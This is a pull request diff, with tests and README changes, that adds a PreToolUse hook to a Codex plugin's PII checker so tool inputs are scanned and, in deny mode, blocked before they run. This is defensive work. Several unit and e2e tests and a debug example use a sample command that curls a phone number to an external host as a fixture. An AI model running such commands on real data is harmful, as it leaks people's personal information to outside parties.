### PR TITLE
fix(sec-core): add Codex PreToolUse PII checker hook

### DIFF
--- a/src/agent-sec-core/codex-plugin/README.md
+++ b/src/agent-sec-core/codex-plugin/README.md
@@ -124,7 +124,7 @@ codex-plugin/
         ├── hooks.json                      ← Hook 声明配置
         ├── code_scanner_hook.py            ← PreToolUse: 代码安全扫描
         ├── prompt_scanner_hook.py          ← UserPromptSubmit: Prompt 注入检测
-        ├── pii_checker_hook.py             ← UserPromptSubmit + PostToolUse: PII 检测
+        ├── pii_checker_hook.py             ← UserPromptSubmit + PreToolUse + PostToolUse: PII 检测
         ├── skill_ledger_hook.py            ← UserPromptSubmit: Skill 完整性验证
         ├── observability_hook.py           ← Turn/Tool 生命周期可观测记录
         └── trace_context.py                ← 链路追踪工具库
@@ -136,7 +136,7 @@ codex-plugin/
 |-----------|--------|---------|------|
 | `code_scanner_hook.py` | PreToolUse | `Bash` | 扫描 shell 命令，检测反弹shell、危险删除等 |
 | `prompt_scanner_hook.py` | UserPromptSubmit | (all) | 检测用户输入中的 prompt 注入攻击 |
-| `pii_checker_hook.py` | UserPromptSubmit + PostToolUse | (all) | 检测用户输入和工具输出中的 PII，deny 模式下阻断对应 payload（不支持脱敏放行） |
+| `pii_checker_hook.py` | UserPromptSubmit + PreToolUse + PostToolUse | (all) | 检测用户输入、工具输入和工具输出中的 PII，deny 模式下阻断对应 payload（不支持脱敏放行） |
 | `skill_ledger_hook.py` | UserPromptSubmit | (all) | 解析 prompt 中的 $skill-name，验证 skill 文件完整性和签名 |
 | `observability_hook.py` | UserPromptSubmit + PreToolUse + PostToolUse + Stop | (all) | 记录 Turn/Tool 生命周期；不改变 Codex 决策 |
 
@@ -157,6 +157,14 @@ Codex Hook 与 `agent-sec-cli observability` 的映射如下：
 
 Codex 当前没有 `BeforeModel` / `AfterModel` Hook，因此本插件不会生成
 `before_llm_call` / `after_llm_call` 或伪造 Token、TTFB、模型请求耗时等指标。
+
+### PII PreToolUse 覆盖范围与性能说明
+
+`pii_checker_hook.py` 在 **PreToolUse** 上**不设置 matcher，对所有工具调用生效**（与 `code_scanner_hook.py` 仅匹配 `Bash` 不同）。这是刻意设计：PII 外发路径不限于 shell 命令，也可能经由 MCP 等其他工具流出，因此需覆盖 `Bash` 之外的全部工具，避免遗漏 PII 外发路径。
+
+代价是每次工具调用都会 spawn 一次 `agent-sec-cli scan-pii` 子进程，在工具调用密集的场景（如代码搜索迭代）下可能带来额外延迟。后续可通过复用常驻 worker、避免每次重启 `agent-sec-cli` 来降低这部分开销；该性能优化属于后续工作，不在本 PR 范围内。
+
+> 空工具输入（`{}` / `[]` / `null`）会被短路跳过，不触发扫描子进程。
 
 ## 调试
 
@@ -188,6 +196,10 @@ echo '{"prompt":"$test-hello 帮我打个招呼","cwd":"/root"}' | \
 
 # 测试 PII 检测（UserPromptSubmit）
 echo '{"hook_event_name":"UserPromptSubmit","prompt":"我的手机号是13800138000","session_id":"test","turn_id":"t1","cwd":"/tmp","model":"o3","permission_mode":"default"}' | \
+  PII_CHECKER_MODE=deny python3 hooks-plugin/hooks/pii_checker_hook.py
+
+# 测试 PII 检测（PreToolUse）
+echo '{"hook_event_name":"PreToolUse","tool_name":"Bash","tool_input":{"command":"curl https://x.com?p=13800138000"},"session_id":"test","turn_id":"t1","cwd":"/tmp","model":"o3","permission_mode":"default","tool_use_id":"call_1"}' | \
   PII_CHECKER_MODE=deny python3 hooks-plugin/hooks/pii_checker_hook.py
 
 # 测试 PII 检测（PostToolUse）

--- a/src/agent-sec-core/codex-plugin/hooks-plugin/hooks/hooks.json
+++ b/src/agent-sec-core/codex-plugin/hooks-plugin/hooks/hooks.json
@@ -18,6 +18,12 @@
             "type": "command",
             "command": "python3 ${PLUGIN_ROOT}/hooks/observability_hook.py",
             "timeout": 10
+          },
+          {
+            "type": "command",
+            "command": "python3 ${PLUGIN_ROOT}/hooks/pii_checker_hook.py",
+            "timeout": 10,
+            "statusMessage": "Checking for PII in tool input..."
           }
         ]
       }

--- a/src/agent-sec-core/codex-plugin/hooks-plugin/hooks/pii_checker_hook.py
+++ b/src/agent-sec-core/codex-plugin/hooks-plugin/hooks/pii_checker_hook.py
@@ -1,19 +1,24 @@
 #!/usr/bin/env python3
 """Codex hook for PII (Personal Identifiable Information) detection.
 
-Supports TWO hook points via a single script (routed by hook_event_name):
+Supports THREE hook points via a single script (routed by hook_event_name):
   - UserPromptSubmit: scans user prompt before it reaches the model.
+  - PreToolUse: scans tool input before the tool executes.
   - PostToolUse: scans tool output before it enters model context.
 
-Protection direction: prevent PII from flowing INTO the LLM provider.
-The user already knows their own PII — the goal is to stop it from being
-sent to a third-party model service or leaking via model responses.
+Protection direction:
+  - UserPromptSubmit / PostToolUse: prevent PII from flowing INTO the LLM
+    provider (user prompt / tool output → model).
+  - PreToolUse: prevent PII from flowing OUT via a tool call (exfiltration),
+    e.g. curl-ing a phone number to an external endpoint or writing PII to
+    a file. This is the only point to catch PII before the tool executes.
 
 Modes (controlled by PII_CHECKER_MODE env var, default: observe):
   - observe: silent pass-through, only audit trail via agent-sec-cli events.
              Even if PII is detected, content will NOT be blocked.
   - deny: block when PII is detected.
           UserPromptSubmit: reject the prompt (user must rephrase).
+          PreToolUse: block the tool call (the tool will not execute).
           PostToolUse: replace tool output with reason text (model won't see PII).
 
 Protocol note: Codex hook protocol is binary (allow/block). There is NO
@@ -116,6 +121,8 @@ def _format_block_reason(
 
     if hook_event == "UserPromptSubmit":
         lines.append("请移除敏感信息后重新提交。")
+    elif hook_event == "PreToolUse":
+        lines.append("该工具调用已被阻止，敏感信息不会外发。")
     else:
         lines.append("工具输出已被拦截，原始内容不会进入模型上下文。")
 
@@ -142,6 +149,20 @@ def _extract_scan_text(input_data: dict, hook_event: str) -> str | None:
             return text
         return None
 
+    if hook_event == "PreToolUse":
+        tool_input = input_data.get("tool_input")
+        if tool_input is None:
+            return None
+        # tool_input is a serde_json::Value — could be string, object, array
+        if isinstance(tool_input, str):
+            return tool_input if tool_input.strip() else None
+        # For non-string types, serialize to text for scanning
+        try:
+            text = json.dumps(tool_input, ensure_ascii=False)
+            return text if text.strip() else None
+        except (TypeError, ValueError):
+            return None
+
     if hook_event == "PostToolUse":
         tool_response = input_data.get("tool_response")
         if tool_response is None:
@@ -161,6 +182,8 @@ def _extract_scan_text(input_data: dict, hook_event: str) -> str | None:
 
 def _source_for_event(hook_event: str) -> str:
     """Return the --source argument value for agent-sec-cli."""
+    if hook_event == "PreToolUse":
+        return "tool_input"
     if hook_event == "PostToolUse":
         return "tool_output"
     return "user_input"
@@ -168,6 +191,8 @@ def _source_for_event(hook_event: str) -> str:
 
 def _source_desc_for_event(hook_event: str) -> str:
     """Return human-readable source description for block reason."""
+    if hook_event == "PreToolUse":
+        return "工具输入"
     if hook_event == "PostToolUse":
         return "工具输出"
     return "用户输入"
@@ -185,7 +210,7 @@ def main() -> None:
 
     # 2. Determine which hook event we're handling
     hook_event = input_data.get("hook_event_name", "")
-    if hook_event not in ("UserPromptSubmit", "PostToolUse"):
+    if hook_event not in ("UserPromptSubmit", "PreToolUse", "PostToolUse"):
         return  # unknown event, fail-open
 
     # 3. Extract text to scan

--- a/src/agent-sec-core/codex-plugin/hooks-plugin/hooks/pii_checker_hook.py
+++ b/src/agent-sec-core/codex-plugin/hooks-plugin/hooks/pii_checker_hook.py
@@ -159,9 +159,13 @@ def _extract_scan_text(input_data: dict, hook_event: str) -> str | None:
         # For non-string types, serialize to text for scanning
         try:
             text = json.dumps(tool_input, ensure_ascii=False)
-            return text if text.strip() else None
         except (TypeError, ValueError):
             return None
+        # Empty containers serialize to non-empty strings ("{}", "[]",
+        # "null") but carry no PII — skip to avoid a wasted scan-pii call.
+        if not text.strip() or text in ("{}", "[]", "null"):
+            return None
+        return text
 
     if hook_event == "PostToolUse":
         tool_response = input_data.get("tool_response")
@@ -173,9 +177,13 @@ def _extract_scan_text(input_data: dict, hook_event: str) -> str | None:
         # For non-string types, serialize to text for scanning
         try:
             text = json.dumps(tool_response, ensure_ascii=False)
-            return text if text.strip() else None
         except (TypeError, ValueError):
             return None
+        # Empty containers serialize to non-empty strings ("{}", "[]",
+        # "null") but carry no PII — skip to avoid a wasted scan-pii call.
+        if not text.strip() or text in ("{}", "[]", "null"):
+            return None
+        return text
 
     return None
 

--- a/src/agent-sec-core/codex-plugin/install.sh
+++ b/src/agent-sec-core/codex-plugin/install.sh
@@ -96,7 +96,7 @@ do_install() {
     info "   请选择信任 (Trust) 以下 hook 使其生效："
     info "   - code_scanner_hook.py   (PreToolUse/Bash)"
     info "   - prompt_scanner_hook.py (UserPromptSubmit)"
-    info "   - pii_checker_hook.py    (UserPromptSubmit + PostToolUse)"
+    info "   - pii_checker_hook.py    (UserPromptSubmit + PostToolUse + PreToolUse)"
     info "   - skill_ledger_hook.py   (UserPromptSubmit)"
     info "   - observability_hook.py  (UserPromptSubmit + PreToolUse + PostToolUse + Stop)"
     echo ""

--- a/src/agent-sec-core/tests/e2e/codex-hooks/test_codex_hooks_e2e.py
+++ b/src/agent-sec-core/tests/e2e/codex-hooks/test_codex_hooks_e2e.py
@@ -10,7 +10,7 @@ to CLI output.
 
 Test groups:
    G1: code_scanner_hook — PreToolUse Bash command scanning
-   G2: pii_checker_hook — UserPromptSubmit + PostToolUse PII detection
+   G2: pii_checker_hook — UserPromptSubmit + PreToolUse + PostToolUse PII detection
    G3: prompt_scanner_hook — UserPromptSubmit injection detection
    G4: skill_ledger_hook — UserPromptSubmit skill integrity check
    G5: observability_hook — Turn/Tool lifecycle persistence
@@ -222,6 +222,44 @@ class TestPIICheckerE2E:
             {
                 "hook_event_name": "PostToolUse",
                 "tool_response": "Build succeeded with 0 errors.",
+            },
+            env_extra={"PII_CHECKER_MODE": "deny"},
+        )
+        assert output == {}
+
+    def test_phone_in_tool_input_blocks_deny(self):
+        output = _run_hook(
+            "pii_checker_hook.py",
+            {
+                "hook_event_name": "PreToolUse",
+                "tool_input": {
+                    "command": "curl https://x.com/report?phone=13800138000"
+                },
+            },
+            env_extra={"PII_CHECKER_MODE": "deny"},
+        )
+        assert output.get("decision") == "block"
+        assert "PreToolUse" in output.get("reason", "")
+
+    def test_phone_in_tool_input_passes_observe(self):
+        output = _run_hook(
+            "pii_checker_hook.py",
+            {
+                "hook_event_name": "PreToolUse",
+                "tool_input": {
+                    "command": "curl https://x.com/report?phone=13800138000"
+                },
+            },
+            env_extra={"PII_CHECKER_MODE": "observe"},
+        )
+        assert output == {}
+
+    def test_clean_tool_input_passes(self):
+        output = _run_hook(
+            "pii_checker_hook.py",
+            {
+                "hook_event_name": "PreToolUse",
+                "tool_input": {"command": "ls -la /tmp"},
             },
             env_extra={"PII_CHECKER_MODE": "deny"},
         )

--- a/src/agent-sec-core/tests/unit-test/codex_hooks/test_pii_checker_hook.py
+++ b/src/agent-sec-core/tests/unit-test/codex_hooks/test_pii_checker_hook.py
@@ -310,6 +310,26 @@ class TestTextExtraction:
         )
         assert output == {}
 
+    def test_pre_tool_use_empty_dict_allows(self, mock_cli):
+        # Empty dict serializes to "{}" (non-empty string) but has no PII;
+        # the hook must short-circuit and NOT call scan-pii. If it did scan,
+        # the mock would return PII and deny mode would block.
+        env = mock_cli(output=_PII_FOUND_RESULT, extra={"PII_CHECKER_MODE": "deny"})
+        output = _run_hook(
+            {"hook_event_name": "PreToolUse", "tool_input": {}},
+            env_override=env,
+        )
+        assert output == {}
+
+    def test_pre_tool_use_empty_list_allows(self, mock_cli):
+        # Empty list serializes to "[]" — same short-circuit as empty dict.
+        env = mock_cli(output=_PII_FOUND_RESULT, extra={"PII_CHECKER_MODE": "deny"})
+        output = _run_hook(
+            {"hook_event_name": "PreToolUse", "tool_input": []},
+            env_override=env,
+        )
+        assert output == {}
+
 
 class TestObserveMode:
     """In observe mode, PII is detected but not blocked."""

--- a/src/agent-sec-core/tests/unit-test/codex_hooks/test_pii_checker_hook.py
+++ b/src/agent-sec-core/tests/unit-test/codex_hooks/test_pii_checker_hook.py
@@ -1,7 +1,7 @@
 """Unit tests for codex-plugin/hooks/pii_checker_hook.py.
 
 Coverage targets:
-  - Dual hook point routing (UserPromptSubmit & PostToolUse)
+  - Triple hook point routing (UserPromptSubmit, PreToolUse & PostToolUse)
   - Text extraction from different event types
   - Fail-open paths (invalid JSON, empty text, subprocess errors)
   - Mode-based decisions (observe vs deny)
@@ -139,6 +139,12 @@ _POST_TOOL_USE_EVENT = {
     "session_id": "sess-1",
 }
 
+_PRE_TOOL_USE_EVENT = {
+    "hook_event_name": "PreToolUse",
+    "tool_input": {"command": "curl https://x.com?p=13800138000"},
+    "session_id": "sess-1",
+}
+
 _PII_FOUND_RESULT = json.dumps(
     {
         "verdict": "warn",
@@ -185,7 +191,7 @@ class TestFailOpen:
     def test_unknown_hook_event_allows(self, mock_cli):
         env = mock_cli(output=_PII_FOUND_RESULT)
         output = _run_hook(
-            {"hook_event_name": "PreToolUse", "prompt": "hello"},
+            {"hook_event_name": "SessionStart", "prompt": "hello"},
             env_override=env,
         )
         assert output == {}
@@ -266,6 +272,44 @@ class TestTextExtraction:
         )
         assert output == {}
 
+    def test_pre_tool_use_string_input(self, mock_cli):
+        env = mock_cli(output=_PII_FOUND_RESULT, extra={"PII_CHECKER_MODE": "deny"})
+        output = _run_hook(
+            {
+                "hook_event_name": "PreToolUse",
+                "tool_input": "curl https://x.com?p=13800138000",
+            },
+            env_override=env,
+        )
+        assert output["decision"] == "block"
+
+    def test_pre_tool_use_dict_input(self, mock_cli):
+        env = mock_cli(output=_PII_FOUND_RESULT, extra={"PII_CHECKER_MODE": "deny"})
+        output = _run_hook(
+            {
+                "hook_event_name": "PreToolUse",
+                "tool_input": {"command": "curl https://x.com?p=13800138000"},
+            },
+            env_override=env,
+        )
+        assert output["decision"] == "block"
+
+    def test_pre_tool_use_empty_string_allows(self, mock_cli):
+        env = mock_cli(output=_PII_FOUND_RESULT, extra={"PII_CHECKER_MODE": "deny"})
+        output = _run_hook(
+            {"hook_event_name": "PreToolUse", "tool_input": ""},
+            env_override=env,
+        )
+        assert output == {}
+
+    def test_pre_tool_use_none_input_allows(self, mock_cli):
+        env = mock_cli(output=_PII_FOUND_RESULT, extra={"PII_CHECKER_MODE": "deny"})
+        output = _run_hook(
+            {"hook_event_name": "PreToolUse"},
+            env_override=env,
+        )
+        assert output == {}
+
 
 class TestObserveMode:
     """In observe mode, PII is detected but not blocked."""
@@ -278,6 +322,11 @@ class TestObserveMode:
     def test_pii_in_tool_output_not_blocked(self, mock_cli):
         env = mock_cli(output=_PII_FOUND_RESULT, extra={"PII_CHECKER_MODE": "observe"})
         output = _run_hook(_POST_TOOL_USE_EVENT, env_override=env)
+        assert output == {}
+
+    def test_pii_in_tool_input_not_blocked(self, mock_cli):
+        env = mock_cli(output=_PII_FOUND_RESULT, extra={"PII_CHECKER_MODE": "observe"})
+        output = _run_hook(_PRE_TOOL_USE_EVENT, env_override=env)
         assert output == {}
 
 
@@ -343,6 +392,13 @@ class TestDenyMode:
         output = _run_hook(_USER_PROMPT_EVENT, env_override=env)
         assert "13800138000" not in output["reason"]
         assert "138****8000" in output["reason"]
+
+    def test_warn_verdict_blocks_pre_tool_use(self, mock_cli):
+        env = mock_cli(output=_PII_FOUND_RESULT, extra={"PII_CHECKER_MODE": "deny"})
+        output = _run_hook(_PRE_TOOL_USE_EVENT, env_override=env)
+        assert output["decision"] == "block"
+        assert "PreToolUse" in output["reason"]
+        assert "该工具调用已被阻止" in output["reason"]
 
 
 class TestUnknownMode:
@@ -435,6 +491,71 @@ class TestMainMonkeypatch:
         )
         source_idx = captured["args"].index("--source")
         assert captured["args"][source_idx + 1] == "tool_output"
+
+    def test_trace_context_injected_for_pre_tool_use(self, monkeypatch, capsys):
+        captured = {}
+
+        def fake_run(args, **kwargs):
+            captured["args"] = args
+            captured["input"] = kwargs.get("input")
+            return subprocess.CompletedProcess(
+                args=args,
+                returncode=0,
+                stdout=json.dumps({"verdict": "pass", "findings": []}),
+                stderr="",
+            )
+
+        monkeypatch.setattr(pii_checker_hook.subprocess, "run", fake_run)
+        self._run_main(
+            monkeypatch,
+            capsys,
+            {
+                "hook_event_name": "PreToolUse",
+                "tool_input": {"command": "curl https://x.com?p=13800138000"},
+                "trace_id": "t1",
+            },
+        )
+        source_idx = captured["args"].index("--source")
+        assert captured["args"][source_idx + 1] == "tool_input"
+        # dict tool_input is serialized to JSON before scanning
+        assert "command" in captured["input"]
+        assert "13800138000" in captured["input"]
+
+    def test_deny_mode_blocks_pre_tool_use(self, monkeypatch, capsys):
+        """deny mode + PreToolUse PII → block with tool input message."""
+
+        def fake_run(args, **kwargs):
+            return subprocess.CompletedProcess(
+                args=args,
+                returncode=0,
+                stdout=json.dumps(
+                    {
+                        "verdict": "deny",
+                        "findings": [
+                            {
+                                "type": "phone_cn",
+                                "severity": "deny",
+                                "evidence_redacted": "138****",
+                            },
+                        ],
+                    }
+                ),
+                stderr="",
+            )
+
+        monkeypatch.setattr(pii_checker_hook.subprocess, "run", fake_run)
+        output = self._run_main(
+            monkeypatch,
+            capsys,
+            {
+                "hook_event_name": "PreToolUse",
+                "tool_input": {"command": "curl x?p=13800138000"},
+            },
+            mode="deny",
+        )
+        assert output["decision"] == "block"
+        assert "工具输入" in output["reason"]
+        assert "该工具调用已被阻止" in output["reason"]
 
     def test_scan_text_passed_via_stdin(self, monkeypatch, capsys):
         captured = {}
@@ -723,6 +844,14 @@ class TestFormatBlockReason:
             findings, "PostToolUse", "工具输出"
         )
         assert "工具输出已被拦截" in reason
+
+    def test_pre_tool_use_message(self):
+        findings = [{"type": "phone_cn", "severity": "warn"}]
+        reason = pii_checker_hook._format_block_reason(
+            findings, "PreToolUse", "工具输入"
+        )
+        assert "该工具调用已被阻止" in reason
+        assert "PreToolUse" in reason
 
     def test_user_prompt_submit_message(self):
         findings = [{"type": "email", "severity": "warn"}]


### PR DESCRIPTION
## Description

Add a **PreToolUse** hook point to the Codex plugin's PII checker
(`pii_checker_hook.py`), so sensitive data is scanned **before** a tool
call executes.

## Motivation & Context

The Codex PII checker previously only hooked `UserPromptSubmit` and
`PostToolUse`, which guard PII **flowing into the LLM** and **in tool
outputs**. It left a gap: PII could be **exfiltrated through tool inputs**
(e.g. a shell command that sends a phone number / token to an external
endpoint) without being inspected before execution.

This closes that gap and aligns Codex with the other plugins
(hermes / openclaw / cosh), which already scan tool inputs pre-execution.

## Changes

- `pii_checker_hook.py`: add a `PreToolUse` branch — extract `tool_input`,
  scan with `--source tool_input`, block on detection.
- `hooks.json`: register `pii_checker_hook.py` on `PreToolUse` as an
  **all-tools (no matcher)** hook, consistent with the other plugins.
- `install.sh`: update the Trust Review doc line
  (`UserPromptSubmit + PostToolUse + PreToolUse`).
- Unit tests + e2e tests for the new PreToolUse branch.

## Consistency notes

- resulting `source="tool_input"` matches all peers.
- Defaults to **observe** mode (`PII_CHECKER_MODE`), opt-in `deny`.
- `--redact-output` intentionally omitted: Codex hooks are binary
  allow/block with no partial redaction.
- **No changes to cosh.**

## Testing

- Unit: codex hooks suite green, `pii_checker_hook.py` coverage **91%**.
- E2E: all PII cases pass (deny blocks PII in tool input; observe & clean pass).

no-issue: small self-contained hardening that aligns the Codex PII checker with the pre-tool scanning already present in the other plugins